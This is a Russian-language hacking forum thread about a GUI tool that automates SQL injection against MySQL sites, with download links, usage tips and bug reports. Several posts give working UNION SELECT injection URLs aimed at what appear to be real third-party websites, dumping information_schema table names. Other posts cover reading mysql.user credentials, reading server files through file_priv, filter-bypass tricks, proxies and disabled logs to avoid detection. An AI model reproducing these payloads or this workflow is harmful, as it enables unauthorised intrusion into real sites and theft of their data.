PDA

Просмотр полной версии : Новая SQL Injection Tool 4

SQLHACK
05.10.2006, 15:27
SQL Injection Tool 4 beta.

Качаем, устанавливаем, отписываем.
http://dbattack.com/files/setup.sipt4.rar

Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в урл пишем
http://localhost/test.php?getid=1{SQLINJ}

а если это текстовый параметр то урл будет такой
http://localhost/test.php?getid=1'{SQLINJ}

ну всё остальное похоже, сообственно кто захочет разберётся.

на сайт не смотрите, пока только в стадии задумки :)))

SQLHACK
21.05.2007, 17:58
Так вот и долгожданный мануал по проге готов и опубликован в разделе статьи. Но он был под версию 3 , так что не совсем актуально, будет время - обновлю
читать тут (http://forum.antichat.ru/thread40545.html)

И ещё маленькое обновление проги, качать с оф.сайта, указан в первом посте.

SQLHACK
01.08.2007, 15:11
Программа может определятся анивирусами такими как например Kaspersky Antivirus 7.0 как HackTool

отчёт об обнаружении: вредоносная программа
HackTool.Win32.SQLInject.i 4 Файл: s-tool.exe

Господа кто подскажет как уладить сложившуюся ситуацию отпишите, обращения в Поддержку ни чего не дало.

SQLHACK
24.05.2008, 16:22
обновил первый пост , читаем , качаем, версия 4 наконец то появилась в паблике, для всеобщего юзанья.

Следующие намеченые обновления:
1. Поддержка HTTP PROXY
2. Benchmark как способ посимвольного брута
3. More1row как способ посимвольного брута
4. Настройка большинства функций для работы в слепом режиме с помощью Benchmark и More1row(изврат конечно, но мало ли кому понадобится).
5. Автоматическая проверка работы через POST, если даже инъекцию вы нашли в GET параметре. Ну например если в скрипте юзается не GET и POST , а например REQUEST

brasco2k
25.05.2008, 17:49
А ничо так программа! Автору респект! за 3 секунды инъекцию раскрутила))

Из плюсов интерфейс стал более понятный.
Прошлая програма мне не очень то и нравилась. т.к разобраться не смог - а это крутая)

T-Rey
25.05.2008, 18:06
А ничо так программа! Автору респект! за 3 секунды инъекцию раскрутила))

Из плюсов интерфейс стал более понятный.
Прошлая програма мне не очень то и нравилась. т.к разобраться не смог - а это крутая)

Полностью согласен!

Автор - зачёт

brasco2k
25.05.2008, 20:05
Хотелось бы русскую версию!

.Begemot.
25.05.2008, 21:21
Хорошо бы было сделать так, что про сохранение логов не спрашивала, поставил таблы брутить и пошёл гулять\чай пить или галочкой отмечать.
P.s.: Может не догнал где эта функция.)

Fugitif
25.05.2008, 21:58
Где я могу получить этот инструмент? (by translator) :)

Piflit
25.05.2008, 22:01
Где я могу получить этот инструмент? (by translator) :)
dl it here

Fugitif
25.05.2008, 22:05
I know that link but don't work for me...I can't download nothing.

SQLHACK
26.05.2008, 00:10
Хорошо бы было сделать так, что про сохранение логов не спрашивала, поставил таблы брутить и пошёл гулять\чай пить или галочкой отмечать.
P.s.: Может не догнал где эта функция.)

галочка в programm settings -> auto clear system log и programm settings -> disable sysem log

SQLHACK
26.05.2008, 00:11
Link works. try to use proxy or socks

Fugitif
26.05.2008, 00:58
I can't also this way...u can upload it pls. on some other server...maybe rapidshare?

thx ;)

Edit:

everything's fine now... downloaded with IE Browser... I can't with Firefox or Opera.

anyway great job, keep it up and try if u can to do also some tut. in english ;)

vp$
26.05.2008, 16:34
не ставится галочка Use proxy (( соответственно поля не активны

Saint-Sky
27.05.2008, 12:18
Хорошо, конечно, что прога дорабатывается, но теперь, к сожалению, приходится пользоваться обеими версиями сразу, а еще и в ручную, вот почему:

1) Переделан DataBrutForce(а он помогал извлекать данные без брута(зная таблицу и поля) с помощью лимита,
2) Убран кодировщик - помогал просматривать диру в браузере(на определенной версии *nix - кто знает, тот поймет),
3) Ожидал, что будет добавлена проверка на возможность доступа к mysql.user и чтение файлов, но она очень криво реализована(через Get Names From Information_schema), а хотелось бы видеть кнопку типа Check access to mysql.user & file_priv current user,
4) Хотелось бы видеть поддержку соксов,
5) В предыдущей версии Order By работала и без определения строки,
6) Практически не работает(по крайней мере у меня) детектор типа базы данных,
7) Хотелось бы, чтобы реализация самого запроса была пересмотрена в сторону CONCAT_WS(можно ввиде галочки) для сокращения самого запроса,
8) При выходе из проги не сохраняется последный урл...

А так - прога просто незаменима, особенно порадовало в новой версии реализация проверки GET-POST и хороший посимвольный брут...

РЕСПЕКТ АВТОРУ!

SQLHACK
27.05.2008, 13:41
Хорошо, конечно, что прога дорабатывается, но теперь, к сожалению, приходится пользоваться обеими версиями сразу, а еще и в ручную, вот почему:

1) Переделан DataBrutForce(а он помогал извлекать данные без брута(зная таблицу и поля) с помощью лимита,
2) Убран кодировщик - помогал просматривать диру в браузере(на определенной версии *nix - кто знает, тот поймет),
3) Ожидал, что будет добавлена проверка на возможность доступа к mysql.user и чтение файлов, но она очень криво реализована(через Get Names From Information_schema), а хотелось бы видеть кнопку типа Check access to mysql.user & file_priv current user,
4) Хотелось бы видеть поддержку соксов,
5) В предыдущей версии Order By работала и без определения строки,
6) Практически не работает(по крайней мере у меня) детектор типа базы данных,
7) Хотелось бы, чтобы реализация самого запроса была пересмотрена в сторону CONCAT_WS(можно ввиде галочки) для сокращения самого запроса,
8) При выходе из проги не сохраняется последный урл...

А так - прога просто незаменима, особенно порадовало в новой версии реализация проверки GET-POST и хороший посимвольный брут...

РЕСПЕКТ АВТОРУ!

Отвечаю
1.Добавлено, просто пока скрыто.
2.Все протестено, просмотр, стал ещё более удобен, там встроен файл менеджер, через SQL, если есть File_Priv то можно просматривать файлы, а если удалённая система это FREEBSD то и каталоги, всё это есть, для просмотра используйте File Path и Dir Path и соответствующие кнопки.
3.Сообственно ни чё кривого нет, просто выбираете, MySQL.user или MySQL.All и тыкаете кнопку Fill. далее выбираете нужные столбцы и тыкаете GET DATA. Если есть доступ к системным таблицам MYSQL , то всё увидете.
4.Будет в следующем релизе.
5.Что то не верится, ибо там проверка та же самая стоит, я только усовершенствовал. Хуже работать не может впринципе.
6.Он вообще не работает, ибо в проге есть функции только для MYSQL.
7. Не будет , ибо так удобнее и програмировать и парсить.
8.Сохрание настроек пока не предусмотрено, в целях вашей же безопастности, но может и сделаю, если очень надо.

Saint-Sky
27.05.2008, 14:57
1.Добавлено, просто пока скрыто.
Приват?
3.Сообственно ни чё кривого нет, просто выбираете, MySQL.user или MySQL.All и тыкаете кнопку Fill. далее выбираете нужные столбцы и тыкаете GET DATA. Если есть доступ к системным таблицам MYSQL , то всё увидете.
А если доступа к mysql нет, а file_priv есть? Не проще ли сразу обо всем сказать[например, добавить пунктами к user(), version(), database()]?
5.Что то не верится, ибо там проверка та же самая стоит, я только усовершенствовал. Хуже работать не может впринципе.
Сейчас даже и не пытается, пока не впишешь Key...
6.Он вообще не работает, ибо в проге есть функции только для MYSQL.
А зачем он тогда? Или другие базы приват? Ведь перебор, например, MSSQL легко организовать через подзапросы...

Tauzer
27.05.2008, 15:38
Русскую версию в студию.

SQLHACK
28.05.2008, 01:03
Русскую версию в студию.
не будет

Karapuziko
28.05.2008, 02:34
не будет
жаль...но за проект спасибо:)
долго мучился?
Люблю я таких людей как ты, - терпеливых и целеустремленных:)(нет я не подлизывался!)

ThreeD
03.06.2008, 18:47
Выражаю уважение таким людям, мало того что проделан немалый труд,так ещё и free.Огромное мегаспасибо, тулза на высоте.По сравнению с третьей версией особо порадовала.Небо и земля.
Когда планируется включить поддержку проксей и всех указанных обновлений? Жду недождусь, не я один :)
Ещё раз спасибо.

IIAHbI4
03.06.2008, 21:31
знаете, я реально за все 2 года что тут торчу ... ну 3ий почти ... понял откуда ноги растут у скулей :|
пасибо тебе скульхак за тулзу!ты реально открыл мне глаз (:

Qws
20.06.2008, 19:45
Блин,а я не могу скачать,у меня какиэто иероглифи показует когда нажимаю на ссилку.
Дайте нормальную.

Fata1ex
20.06.2008, 20:08
Скачай download'er любой и добавь в закачки.

guest3297
20.06.2008, 22:18
Ну найденные мной критические ошибки.

1) Не сохраняет текущую сессию и если вылетает надо вбивать и искать все заново.
2) Нельзя сохранить сканирование как задачу. (Тоесть сделать определенные действий сохранить, выйти, запустить загрузить продолжить)
3) Не сохраняються пути до словарей если они не лежат в директории с программой.
4) При работающим сканировании попытка изменить какие либо настройки (например добавить или изменить лист вылетает алерт далее вылетает сама прога, мативировав это тем что не может писать в используемый файл, и тут уже первый пункт)

Из маленьких недочетов.
1) Очень раздражает когда спрашивает сохранить отчет в файл или нет, тоесть нельзя поставить сливаться структуру и пойти пить чай, надо постоянно тыкать.

В целом большой респект, прога порадовала.
Не сочти данные ошибки как претензии наоборот =)
Если что ася та же.
Спасибо.

Dr.Frank
21.06.2008, 19:00
такс, не понравилось следующее:
Открыл прогу, проверил одну скули(с загруженными словарями таблиц и колонок), закрыл. Открываю опять, проверяю другую скулю(все галочки с имен таблиц убрал, добавил свое имя таблицы), прога начала проверять все! имена таблиц из словаря, даже на которых не стояли галочки.. =/

guest3297
22.06.2008, 02:58
надо нажать на "сохранить словарь".

SQLHACK
22.06.2008, 15:39
2 [cash]
1) Не сохраняет текущую сессию и если вылетает надо вбивать и искать все заново.
2) Нельзя сохранить сканирование как задачу. (Тоесть сделать определенные действий сохранить, выйти, запустить загрузить продолжить)
3) Не сохраняються пути до словарей если они не лежат в директории с программой.

Сохрание параметров пока в проге не активировано мною, но практически дописано, по этому пока ничё и не сохраняется.

4) При работающим сканировании попытка изменить какие либо настройки (например добавить или изменить лист вылетает алерт далее вылетает сама прога, мативировав это тем что не может писать в используемый файл, и тут уже первый пункт)

да, такая штука, есть, пока не нашёл вариантов как сделать изменения на лету , скорее всего просто залочу некоторые контролы в процессе сканирования.

Из маленьких недочетов.
1) Очень раздражает когда спрашивает сохранить отчет в файл или нет, тоесть нельзя поставить сливаться структуру и пойти пить чай, надо постоянно тыкать.

Есть галочка в настройках, авто очищение, и совсем отключение лога.

guest3297
22.06.2008, 17:40
все таки было бы супер если можно было сохранять скули в какие то файлы. и загружать их потом потаму что вводить по несколько раз очень раздражает.

Так же не как не могу сохранить путь до словарей.

ZAMUT
23.06.2008, 10:51
нужно потсавить табуляцию для таблиц относящихся к определенной table_schema (при сохранинеии в файл дампа INFORMATION_SCHEMA)

shellz[21h]
24.06.2008, 19:48
прога отличная.
вот только один минус
---------------------------------------------
| Names from Information_schema |
поля from [999] и To [999]
В этим поля можно записать мах значение 999, а иногда нужно больше.

Анлогично и с Get data from tables.

SQLHACK
24.06.2008, 23:59
']все таки было бы супер если можно было сохранять скули в какие то файлы. и загружать их потом потаму что вводить по несколько раз очень раздражает.

Так же не как не могу сохранить путь до словарей.

да я же сказал всё уже почти сделано, настройки проги можно будет сохранить в произвольный файл, хоть сплойты пиши

| Names from Information_schema |
поля from [999] и To [999]
В этим поля можно записать мах значение 999, а иногда нужно больше.

Анлогично и с Get data from tables.

сделано, сорри не сразу понял про что вы...

shellz[21h]
25.06.2008, 15:17
SQLHACK скачал с первой страницы sip4, но поля такие же остались. длина поля осталась прежней, можно вести максимальное число в 3 цифры [999]. хотелось бы чтоб можно было вводить до 100к. а то приходится дампить большие базы.

сделано, сорри не сразу понял про что вы...
Хотелось бы знать где исправленая версия? с более большими полями :)

SQLHACK
25.06.2008, 22:44
']
Хотелось бы знать где исправленая версия? с более большими полями :)
а ты думаешь , я после каждого багфикса выкладывать буду, я щас написал несколько новых вещей, добавил кнопочек и всяких настроек , кое чего исправил, что то дополнил, вот как все изменения отлажу, так и выложу. думаю 1-2 недели понадобится, может меньше, зависит от свободного времени.

IIAHbI4
26.06.2008, 02:26
Бойтесь своих желаний. Они могут исполниться.... соль
жду апдейта.

(Dm)
26.06.2008, 12:41
Добавь # в Close SQL . потому что в mysql 5 . /* требует закрытия

(Dm)
26.06.2008, 12:45
Хочется чего нить консольного и кроссплатформенного)

SQLHACK
26.06.2008, 12:59
Добавь # в Close SQL . потому что в mysql 5 . /* требует закрытия

А %23 это по вашему не знак решётки (#) ?
Смотрите внимательней!

guest3297
26.06.2008, 14:56
Добавь # в Close SQL .
# в чистом виде не примимаеться в url строке.

SQLHACK
27.06.2008, 02:33
кеш почуял тему...

shellz[21h]
29.06.2008, 15:29
Хотелось бы увидеть в проге Обход на фильтрацию UNION и SELECT.
Вроде того:
UnIoN+SeLeCt

brasco2k
29.06.2008, 19:59
']Хотелось бы увидеть в проге Обход на фильтрацию UNION и SELECT.
Вроде того:
UnIoN+SeLeCt
это разве обход :) ?
Например ununionion - обход :)

SQLHACK
08.07.2008, 01:42
Теперь все обсуждения моей проги SIPT тут.
http://dbattack.com/

SQLHACK
09.07.2008, 16:27
Добавлен мануал к 4 версии проги, брут пока не описан т.к. не дописана прога

mouse.pro
18.07.2008, 12:41
А будет ли версия под nix ? желательно с интерфейсом под gnom ?)

$n@ke
24.07.2008, 14:40
когда релиз багфиксов? или новой версии?

SQLHACK
24.07.2008, 14:52
сегодня

Выложена новая версия.
Скачиваем, работаем ...:)

SQLHACK
24.07.2008, 14:53
А будет ли версия под nix ? желательно с интерфейсом под gnom ?)
нет. VB под никсы нет ))))

mouse.pro
24.07.2008, 23:51
нет. Vb под никсы нет ))))
А кто сказал что под никс есть Vb ?=)
Перепиши на си =)

$n@ke
06.08.2008, 13:12
если обновленная версия в первом топике, то где обновление связаное с кол-вом таблиц? как и раньше не более 999 ((

~!DoK_tOR!~
12.08.2008, 22:00
если обновленная версия в первом топике, то где обновление связаное с кол-вом таблиц? как и раньше не более 999 ((

а что мешает самому добавить?!

NaX[no]rT
13.08.2008, 22:36
Картиночки-то там любые можно ;) ...
З.Ы.: +Тоха+ очень суровый человек, т.к. я сейчас очень тоже суровый.

neprovad
16.09.2008, 22:15
Когда указываю дополнительные заголовки: Cookie: PHPSESSID=блаблабла, то вместо указанным мной данных нагло посылает другие куки, из чего делаю вывод что соединяется с сайтом программа раньше чем я даю ей команду :\

LiteMentaL
21.09.2008, 18:10
некачает... :( дайте другую ссылку

dim_on
05.11.2008, 23:35
Ребят, че тормозите? Автор же в начале написал что идем сюда: http://dbattack.com/forum/index.php

$vorishka$
07.01.2009, 05:05
перезалейте SQL Injection Tool 4 и мануал please, сайт автора в дауне...

Assembler
07.01.2009, 16:40
Держи SIPT 4 (http://pashkela.narod.ru/progi/sipt4.rar)

qazer
07.01.2009, 20:05
а не найдутся добрые люди,которые напишут мануал по этой программе (желательно с картинками).думаю многим поможет

PaLb14
07.01.2009, 20:44
http://forum.antichat.ru/thread40545.html А это чем тебе не мануал ?!

ZEXEL
11.01.2009, 21:10
SQL Injection Tool 4 (http://www.uploading.com/files/A0TV8RJJ/sipt4.rar.html )

Перезалил - отсюда быстрей будет качать - а то с народа качает 20 минут !

Iceangel_
11.01.2009, 23:35
У многих людей возникает вопрос(даже после прочтения мануала к проге), как все-таки юзать эту прогу...
я за 5 минут наваял комикс "Как начать работу с программой", надеюсь кому-нибудь он поможет...
Допустим мы нашли инъекцию:
http://www.bpeg.ca/code/news/nw/article.php?id=-111+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13--
теперь смотрим мануал, там все на пальцах расписано, что и как скармливать SIPT`у, чтобы он начал работу с инъекцией...

Открыть мануал (http://i003.radikal.ru/0901/fc/f123b8a19893.jpg)

Велемир
27.01.2009, 20:00
Не пашет брут путей почему-то в SIPTe.Задал путь к текстовому файлегу с путями в виде ../../../../conf/httpd.conf из темы путей по умолчанию к конфигам и базам.Жму "Brute Paths" и молчание в ответ =_=. У кого-нибудь работает ?

Rubick
29.01.2009, 21:52
А у меня траблы с настройкой прокса у этой проги. Короче настройки прокси заблокированы и поставить галочку в чекбоксе "Use Proxy" не дает, как в прочем и использовать Netcat. Использую версию с диска к журналу Хакер за август 2008 года, ибо те версии, которые можно скачать по ссылкам данной темы форума, такую возможность напрочь не имеют, чего собственно и ждут наши братья из управления К. А dbattack уже много дней не доступен.

Iceangel_
29.01.2009, 23:17
2 Велемир
У меня тоже не работает...
вот написал скрипт для брута, может пригодится...
http://forum.antichat.ru/showpost.php?p=1088353&postcount=615

2 Rubick
А это специально так задумано, чтобы кто попало под проксями сайты не хекал, ты возьми ресурс едитор какой-нибудь и исправь это дело... А если серъезно, то да, не пашет ((...

SQLHACK
30.01.2009, 03:27
версия 5 в разработке, версия 4 - поддержка оффициально приостановлена

Rubick
31.01.2009, 00:24
IceAngel_
А это специально так задумано, чтобы кто попало под проксями сайты не хекал, ты возьми ресурс едитор какой-нибудь и исправь это дело... А если серъезно, то да, не пашет ((...

Если бы он включался LordPE или PETools ами я бы сюда не писал. Я честно его отдекомпилил, посмотрел код, там ведь все необходимое присутствует. Я про процедуры: 1.57 ChkProxy.Click();
1.59 TxtProxyPort.Change() ну и т.д. А вот активировать Бокс Proxy Settings мне не судьба. Я на стока в риверсе не шарю.
А за то что 5-ая скоро появится и надеюсь в ней все будет оргомный Автору РЕСПЕКТИЩЕ. Буду ждать с нетерпением. Только вот как я говорил и ранее и повторюсь еще дбаттак валяется. Зайти на него нельзя.

pinky07
03.02.2009, 20:02
помогите пожалуйста, как сделать, что бы прога после комментария -- ставила пробел + (именно плюсиком)

Iceangel_
03.02.2009, 20:05
2pinky07
http://localhost/test.php?getid=1{SQLINJ}+

pinky07
03.02.2009, 20:13
2pinky07
Щас получается -- +, а надо что бы было --+
З.ы. Все догнал, я просто убрал в настройках комментарии и сам дописал +--+

SWAT
05.02.2009, 17:31
дайте валидную ссылку на эту прогу

faza02
06.02.2009, 21:45
_http://stream.ifolder.ru/6730914
вот нашел.. если кто может, перезалейте на рапиду хотя бы.

pinky07
07.02.2009, 15:25
rapidshare http://rapidshare.com/files/195062572/setup.sipt4.txt
letitbit http://letitbit.net/download/597e13284644/setup.sipt4.txt.html
depositfiles http://depositfiles.com/files/aslijvvpt

Велемир
23.02.2009, 14:53
Обращаюсь к разработчику: Мне,как фанату,очень интересно,что будет включено в новую версию(если я ничего не пропустил,хотя перечитывал тему не одинь раз) программы и когда она примерно выйдет?:)ИЗ пожеланий хотелось бы увидеть дампер содержимого таблиц и полей в новой версии.Было бы очень замечательно... Также я заметил,что прога некорректно обрабатывает данные(не знаю,почему),когда на сайте очень много различных цифр(не спрашивайте,что за кретин их там написал))) ).Brute Paths,к величайшему сожалению из сожалений,не работает...А также косяки с прокси.Лично меня всё остальное устраивает,а недавно я даже заметил,как системные логи отключать)))))))))))))).Аналогов у SIPTа НЕТ...И слава Богу,что больше не придётся писать подобных прог другим )))

SQLHACK
24.02.2009, 00:54
Дампер содержимого там есть , и таблиц и полей и всего остального.
Данные могут некорректно обрабатываться когда на сайте более 65536 слов исключая теги.да на это есть косяк MS, тут я не властен.
Brute Paths к моему величайшему оху.....ию реально работает, не знаю как там у вас, но FILE_PRIV должен быть YES.
Ну а с прокси я не знаю какие у вас косяки, но насколько я помню, то в 4 версии проги вообще нет упоминая про прокси, где вы их нашли блин, МИСТИКА )))

Iceangel_
24.02.2009, 15:39
2 SQLHACK
то в 4 версии проги вообще нет упоминая про прокси, где вы их нашли блин, МИСТИКА )))
не буду голословным...
http://s51.radikal.ru/i134/0902/bf/f2ad9e111a70.jpg (http://www.radikal.ru)
WTF???

SQLHACK
24.02.2009, 16:26
ну этот скрин не с последней версии, сорри , последняя версия выглядит иначе.

MyTHblu
24.02.2009, 23:42
обьясните нубу, скачал тхт файл, проги самой не вижу, че нада делать?

Assembler
01.03.2009, 18:12
В .rar переименуй!

krobol
04.03.2009, 01:20
ну этот скрин не с последней версии, сорри , последняя версия выглядит иначе.

выложи, пожалуйста, ссылку на последнюю версию

у тебя в подписи - "Сайт о SQL Injection Tool 4" - http://dbattack.com/ - он не работает.

!!! СПАСИБО! за очень полезную и нужную софтину!

с нетерпением ожидаем новой версии

Велемир
12.03.2009, 01:06
Эээ... или я идиот,или где там дампер содержимого таблиц,полей и всего остального ?)))

laedafess
12.03.2009, 19:43
Эээ... или я идиот,или где там дампер содержимого таблиц,полей и всего остального ?)))
http://pic.ipicture.ru/uploads/090312/50lBAcHRq4.jpg (http://ipicture.ru/)

sboy20042
14.03.2009, 16:40
а сайт лежит? или у меня нсы тупят?

sboy20042
14.03.2009, 16:47
перезалейте плиз у кого есть

Dyxxx
14.03.2009, 21:17
здесь в теме лежали сцелочки, первые две точно робют, дале не проверял
http://pashkela.narod.ru/progi/sipt4.rar
http://www.uploading.com/files/A0TV8RJJ/sipt4.rar.html
rapidshare http://rapidshare.com/files/195062572/setup.sipt4.txt
letitbit http://letitbit.net/download/597e13284644/setup.sipt4.txt.html
depositfiles http://depositfiles.com/files/aslijvvpt

j0ker13
19.03.2009, 01:08
автору
дописал бы чтоб дата лог сохранялся сам например после добавления новой записи а то прога иногда вылетает с ошибкой...)

SQLHACK
25.03.2009, 01:24
а поставить галку "Disable system log" не судьба ?

IIAHbI4
26.03.2009, 19:02
скуль ты куда пропал? огромная просьба, добавь поддержку проксиков! а нто приходиться ds покупать /:

IIAHbI4
26.03.2009, 21:25
+ заметил такую багу :
когда ставишь от 0 до 9999, вылетает с критом
http://clip2net.com/clip/m10530/thumb640/1238088262-clip-9kb.png (http://clip2net.com/page/m10530/771970)
то есть, если в таблице больше 9999 ровзав, выкидывает. :confused:

Велемир
09.04.2009, 17:52
Несколько вопросов и предложений:

1) Где анонсируются обновления данного продукта ?
2) Как скачать его и будет ли дальнейшее его развитие ?
3) Хорошо бы сделать перебор по лимиту из information_schema побольше(50 или 100к),а то иногда базы бывают оч большие,и приходится писать скрипты для дампа...Медленно.но работает:).

ЗЫ: Почему-то не работает у меня Брут путей:( У кого работает,простьа отписать сюда свои аськи(если хотите конечно),и я с вами свяжусь.Или же помочь мне как-то,ну:(:(:(.

А так,автору респект(ещё один? :):) )
Если что найду,то сразу же отпишусь )

almazz
09.04.2009, 22:30
бля на файлбим закиньте некачаеться

IDW
13.04.2009, 18:05
а чё с сайтом? там редирект на какой-то левак :(

fker
15.04.2009, 16:56
пыщьь (http://pashkela.narod.ru/progi/sipt4.rar) . Если у кого есть, поделитесь 3-й версией.

o3,14um
17.04.2009, 04:52
третья версия (http://slil.ru/27458030)

огромный респект за прогу, улчше третьей версии и панголина в тыщи раз)) на данный момент самая крутая прога для работу с мускулями =)

farpost
31.05.2009, 12:48
Беда в следующем. Пробую разные сайты подверженные SQL INJ вручную таблицы и колонки из Information_Schema выдёргиваются нормально. С помощью SIPT нормально получается выводить версию БД итд... НО удаётся получить только таблицу COLLATIONS. В чём проблема?

http://img194.imageshack.us/img194/7702/problemanv.th.jpg (http://img194.imageshack.us/my.php?image=problemanv.jpg)

Pashkela
31.05.2009, 18:56
может просто не быть прав на чтение, или пустые все остальные, что врядли. Вообще SIPT4 - ахрененная штука, но только после детального анализа РУЧКАМИ.

Плюс у тебя не стоит галочка напротив Encoding AES - очень может быть в этом всё дело. Или РУЧКАМИ в браузере попробуй unhex(hex(ДАННЫЕ))

Да, SIPT4 - это чудо, но чудо автоматизации, а что-либо автоматизировать можно только когда знаешь весь процесс от и до.

HAXTA4OK
31.05.2009, 19:14
может быть что просто БД разные))))не обязательно что стоит тока infor.... могут быть и другие)))

farpost
31.05.2009, 20:04
вручную таблицы и колонки из Information_Schema выдёргиваются нормально

галка Encoding AES не помогла

farpost
31.05.2009, 20:24
Рассмотрим на живом примере теперь.

http://www.tauntonschool.co.uk/foundation/index.php?id=-539'+union+select+1,2,GROUP_CONCAT(table_name),4+f rom+information_schema.tables+--+

Видим таблицы:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,USER_PRIVILEGES,VIEWS,courier_news_files,cour ier_news_schools,events,events_images,file_categor ies,file_categories_dev,............

Теперь скормим программе:

http://img188.imageshack.us/img188/8829/61381266j.th.jpg (http://img188.imageshack.us/my.php?image=61381266j.jpg)

Опять нашёл только одну таблицу. WTF??

farpost
31.05.2009, 20:49
Проблему нашёл:
SIPT делает два запроса:

Превый:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+

Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).

Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+ 2,1--+

Который само собой ничего не выводит.

Второй запрос должен быть таким:

http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+

Это у меня сборка такая косячная или я чего то не догоняю???

И наконец то нашёл косяк в том что стоит галка AddLimit.

То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.

SQLHACK
01.06.2009, 13:55
Проблему нашёл:
SIPT делает два запроса:
Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.

Который само собой ничего не выводит.

Да это косяк сборки, я признаюсь косякнул, но перекомпилить не могу.
Чтобы обойти этот баг, надо просто к запросу добавить limit 0 в строке УРЛ и снять галку add limit

чтобы исходный запрос получился типа этого
SELECT * FROM users WHERE id=567 limit 0 union select 1,2,3...
например

.php?id=567+limit+0{SQLINJ}
тогда все будет прекрасно работать ибо это одно и тоже.

farpost
02.06.2009, 01:20
спасибо. тулза очень удобнаю. приноровился к её особенностям так сказать. юзаю...

Когда ищу колонки, в строек пишу так:
news.php?newsid=1+AND+1=1{SQLINJ}

Когда ищу таблицы и дамплю, просто делаю равенство неверным:

news.php?newsid=1+AND+1=2{SQLINJ}

Велемир
21.06.2009, 00:12
Прога замечательная.Я заточил её под постгре и оракл)).Пара пожеланий:

1.Увеличить диапазоны перебираемых таблиц и полей из базы.После 30к записей вылетает с ошибкой.
2.Добавить комментарий --,а то каждый раз приписывать плюсики напрягает)))
3.Очень хотелось бы видеть поддержку для OracleSql,PostgreSql MsSql.Проходит ли работа в данном направлении. ?
4.Поддержка авторизации,ибо sql inj может быть недоступна при отсутствии авторизационных данных.Если такое уже сделали,то просветите,пожалуйста.(Ожи алось что-нибудь вроде полей username/password).

Автору,конечно же,пожелаю здоровья и тратить побольше времени для любимого сипти))).Если что найду - сразу же отпишусь.

Dr.Frank
21.06.2009, 20:10
при sql-переборе post-методом, если нужно подставить дополнительные данные(а именно кукисы), то программа подставляет их неправильно, т.е. перед этими данными не ставится перенос строки, "\r\n", и весь запрос в пи*ду.

Reason89
03.07.2009, 15:29
Перезалейте кто нить, ссылка битая уже

Amoura
03.07.2009, 15:42
Перезалейте кто нить, ссылка битая уже

__http://rapidshare.com/files/251409152/sipt4.rar.html

вот залил..

da_vinche
06.07.2009, 02:00
Перезалейте пжл. Не качает.

rolex
06.07.2009, 02:53
http://depositfiles.com/files/60z5iznfr
http://ifolder.ru/12972726
http://www.rapidshare.ru/1091583
http://up-file.com/download/3124988aaddf01c5d297323012290458e
http://www.megaupload.com/?d=IYSP4AQ7
http://letitbit.net/download/1496.1253db6e726ba0fa7b35433f9/sipt4.rar.html

fin13
06.07.2009, 14:58
dl it here
имеется прога и уязвимость выданная сканером что дальше не как не могу понять куда и что вставлять :confused:

Pashkela
28.07.2009, 21:31
На всякий случай, так мой сайт на народе похерили, SIPT4:

скачать (http://bug-track.ru/prog/sipt4.rar)

ЗЫЖ Чисто из уважения к автору и к самой проге, аналогов нет только потому, что это адский труд, попытаться даже предусмтотреть более-менее все возможные варианты настолько качественно. Планету хакерам!

it's my
15.08.2009, 12:56
чо за?
http://img16.imageshack.us/img16/6804/73747677.png

SQLHACK
15.08.2009, 13:07
чето не так с твоей виндой, или XPSP3 или какая другая, я не тестил, только в XP SP 2 тестировалась

it's my
15.08.2009, 13:32
да сп третья, это чревато неработоспособностью программы?

aka PSIH
15.08.2009, 13:35
нормально на SP3 работает...

it's my
15.08.2009, 13:42
кинь инстал свой, а не те что на разных сайтах я качал, мб и получится :( но чот сомневаюсь, штук 6 разных скачал и ни как
или подкиньте третью версию

Rubick
31.08.2009, 19:46
Автор, а что там с 5-ой версией?

axe89
02.09.2009, 00:07
SQL Injection Tool 4 beta.

Качаем, устанавливаем, отписываем.

Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в урл пишем
http://localhost/test.php?getid=1{SQLINJ}

а если это текстовый параметр то урл будет такой
http://localhost/test.php?getid=1'{SQLINJ}

ну всё остальное похоже, сообственно кто захочет разберётся.

на сайт не смотрите, пока только в стадии задумки :)))
Чёт не качает можешь перезалить?

Велемир
02.09.2009, 01:57
Анонсироваться буит или зависло всё ?

SQLHACK
03.09.2009, 21:16
собственно пятая версия затухла всвязи с забиванием всех кодеров которые хоть как то умеют кодить на qt

